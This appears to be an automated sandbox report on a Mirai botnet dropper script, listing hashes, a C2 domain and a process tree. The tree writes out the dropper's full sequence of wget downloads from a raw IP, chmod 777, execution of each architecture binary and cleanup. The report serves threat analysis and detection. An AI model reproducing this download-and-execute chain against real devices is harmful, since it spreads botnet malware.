Analysis

  • max time kernel
    10s
  • max time network
    11s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipsel
    image:debian9-mipsel-20240418-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    23-11-2024 17:20

General

  • Target

    ssh.sh

  • Size

    639B

  • MD5

    61f6f361a8641428ec15e652569064b8

  • SHA1

    f3c5b2338ce425c32eec3abd2310ba992bd3ab94

  • SHA256

    ce3ca0522b38c3931522cac2f1218dbc231624674dcc80ce76b4a26ecffdd8f1

  • SHA512

    0402ef7c2bd4100f3c40ec5d2a60fe1060cd5a42f4762dd398e685db82abd221df7f260be27a3c95394ba7b0665556b2e22f860f23bf6fceda6651e1048471fe

Malware Config

Extracted

Family

mirai

C2

gay.nguyenletriloc.pro

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification (1 TTPs, 8 IoCs)

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE (8 IoCs)

Processes

  • /tmp/ssh.sh
    /tmp/ssh.sh
    1⤵
    PID:693
    • /bin/rm
      rm -rf main_arm
      2⤵
      PID:695
    • /usr/bin/wget
      wget http://66.36.234.2/main_arm -O -
      2⤵
      PID:697
    • /bin/chmod
      chmod 777 main_arm
      2⤵
      • File and Directory Permissions Modification
      PID:718
    • /var/tmp/main_arm
      ./main_arm avtech
      2⤵
      • Executes dropped EXE
      PID:720
    • /bin/rm
      rm -rf main_arm
      2⤵
      PID:722
    • /bin/rm
      rm -rf main_arm5
      2⤵
      PID:723
    • /usr/bin/wget
      wget http://66.36.234.2/main_arm5 -O -
      2⤵
      PID:724
    • /bin/chmod
      chmod 777 main_arm5
      2⤵
      • File and Directory Permissions Modification
      PID:727
    • /var/tmp/main_arm5
      ./main_arm5 avtech
      2⤵
      • Executes dropped EXE
      PID:728
    • /bin/rm
      rm -rf main_arm5
      2⤵
      PID:730
    • /bin/rm
      rm -rf main_arm6
      2⤵
      PID:731
    • /usr/bin/wget
      wget http://66.36.234.2/main_arm6 -O -
      2⤵
      PID:732
    • /bin/chmod
      chmod 777 main_arm6
      2⤵
      • File and Directory Permissions Modification
      PID:733
    • /var/tmp/main_arm6
      ./main_arm6 avtech
      2⤵
      • Executes dropped EXE
      PID:734
    • /bin/rm
      rm -rf main_arm6
      2⤵
      PID:736
    • /bin/rm
      rm -rf main_arm7
      2⤵
      PID:737
    • /usr/bin/wget
      wget http://66.36.234.2/main_arm7 -O -
      2⤵
      PID:738
    • /bin/chmod
      chmod 777 main_arm7
      2⤵
      • File and Directory Permissions Modification
      PID:739
    • /var/tmp/main_arm7
      ./main_arm7 avtech
      2⤵
      • Executes dropped EXE
      PID:740
    • /bin/rm
      rm -rf main_arm7
      2⤵
      PID:742
    • /bin/rm
      rm -rf arm
      2⤵
      PID:743
    • /usr/bin/wget
      wget http://66.36.234.2/arm -O -
      2⤵
      PID:744
    • /bin/chmod
      chmod 777 arm
      2⤵
      • File and Directory Permissions Modification
      PID:745
    • /var/tmp/arm
      ./arm avtech
      2⤵
      • Executes dropped EXE
      PID:747
    • /bin/sh
      /bin/sh ./arm avtech
      2⤵
      PID:747
    • /bin/rm
      rm -rf arm
      2⤵
      PID:750
    • /bin/rm
      rm -rf arm5
      2⤵
      PID:751
    • /usr/bin/wget
      wget http://66.36.234.2/arm5 -O -
      2⤵
      PID:752
    • /bin/chmod
      chmod 777 arm5
      2⤵
      • File and Directory Permissions Modification
      PID:759
    • /var/tmp/arm5
      ./arm5 avtech
      2⤵
      • Executes dropped EXE
      PID:761
    • /bin/sh
      /bin/sh ./arm5 avtech
      2⤵
      PID:761
    • /bin/rm
      rm -rf arm5
      2⤵
      PID:764
    • /bin/rm
      rm -rf arm6
      2⤵
      PID:765
    • /usr/bin/wget
      wget http://66.36.234.2/arm6 -O -
      2⤵
      PID:766
    • /bin/chmod
      chmod 777 arm6
      2⤵
      • File and Directory Permissions Modification
      PID:782
    • /var/tmp/arm6
      ./arm6 avtech
      2⤵
      • Executes dropped EXE
      PID:783
    • /bin/sh
      /bin/sh ./arm6 avtech
      2⤵
      PID:783
    • /bin/rm
      rm -rf arm6
      2⤵
      PID:786
    • /bin/rm
      rm -rf arm7
      2⤵
      PID:787
    • /usr/bin/wget
      wget http://66.36.234.2/arm7 -O -
      2⤵
      PID:788
    • /bin/chmod
      chmod 777 arm7
      2⤵
      • File and Directory Permissions Modification
      PID:795
    • /var/tmp/arm7
      ./arm7 avtech
      2⤵
      • Executes dropped EXE
      PID:796
    • /bin/sh
      /bin/sh ./arm7 avtech
      2⤵
      PID:796
    • /bin/rm
      rm -rf arm7
      2⤵
      PID:799
    • /bin/rm
      rm /tmp/ssh.sh
      2⤵
      PID:800

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /var/tmp/main_arm

    Filesize

    130KB

    MD5

    b5b7f0c68cdf6458e137e7dfb1d74e6f

    SHA1

    ceb4700b167cff05ccb77a25260bf696b39b8e63

    SHA256

    6017dc10e1edd004384c5b0033e237a81e293d8668459c107f057fbdc62f771c

    SHA512

    acdcee90b0ff85e4ed35ba3ab254065b43645ddc0242f097392f8b49967642a95d393b43e039c84aa5e9c52dbfd5efd27a441162227ac3b9b169226c228a3c3d

  • /var/tmp/main_arm5

    Filesize

    130KB

    MD5

    b3d2c1afb1984b43648625b48eb1373e

    SHA1

    3592776c6e0f9e67c38c5a8bfff7da67629b6713

    SHA256

    7066eea40920fc2a9a029276906a8fd8188f501f7c14078116e0523e667687a2

    SHA512

    0f739303ac523d66eb032500f7bfd48bc5fa5f26bac43124a4d2564ae1a5558dfcfae7a70e45907ba7d15a82ae01d507fdd78a97de3050b5a982dcf7a5c3d627

  • /var/tmp/main_arm6

    Filesize

    142KB

    MD5

    daa33b1e666b1386b51ff9793150fdff

    SHA1

    999d619976b11ae71e575ced094011f0b95b1905

    SHA256

    d47526004f78450ce96e34f8cbb0a77a12d7aa083ff4e497a67ca65130bca32e

    SHA512

    c351a078605d2870a643b1822d3fcf412aad81e20a4d1dc6c505f09c64c81881d75feb1c4e6bea60814191bf3b984a2b080a950a1aa29b3cc920affd48be9fa6

  • /var/tmp/main_arm7

    Filesize

    179KB

    MD5

    0523d595f7f8b7b8bf05cb804de5f32f

    SHA1

    5fcd1fb36f56d96c9185ce454613946f7161df4d

    SHA256

    7045550dcae0e634c84ac8729c51c0972de3ec326d6541d48d2fc3fbc8c59093

    SHA512

    079cd6dfe752a3024837909873b6fe029fe5171ec25cd081a39b36652c52f42d75b321e3acd48e37f43f3409f82448a02b94d7eefbfe5a7ccbd73e131290439b